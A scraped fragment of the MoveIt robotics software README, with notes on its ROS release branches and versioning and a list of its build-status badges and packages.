*   The *-devel branches correspond to released and stable versions of MoveIt for specific distributions of ROS. noetic-devel is synced to master currently.
*   Bug fixes occasionally get backported to these released versions of MoveIt.
*   To facilitate compile-time switching, the patch version of MOVEIT_VERSION of a development branch will be incremented by 1 w.r.t. the package.xml's version number.

**MoveIt Status****Continuous Integration**

service

Melodic

Master

GitHub

 

 

CodeCov

build farm

  

**Licenses**

**ROS Buildfarm**

MoveIt Package

Melodic Source

Melodic Debian

Noetic Source

Noetic Debian

**moveit**

moveit\_core

moveit\_kinematics

**moveit\_planners**

moveit\_planners\_ompl

moveit\_planners\_chomp

chomp\_motion\_planner

moveit\_chomp\_optimizer\_adapter

pilz\_industrial\_motion\_planner

pilz\_industrial\_motion\_planner\_testutils

**moveit\_plugins**

moveit\_fake\_controller\_manager

moveit\_simple\_controller\_manager

moveit\_ros\_control\_interface

**moveit\_ros**

moveit\_ros\_planning

moveit\_ros\_move\_group

moveit\_ros\_planning\_interface

moveit\_ros\_benchmarks

moveit\_ros\_perception

moveit\_ros\_occupancy\_map\_monitor

moveit\_ros\_manipulation

moveit\_ros\_robot\_interaction

moveit\_ros\_visualization

moveit\_ros\_warehouse

moveit\_servo

**moveit\_runtime**

moveit\_commander

moveit\_setup\_assistant

**moveit\_msgs**

geometric\_shapes

srdfdom

moveit\_visual\_tools

moveit\_tutorials

**Stargazers over time**

Tag

#debian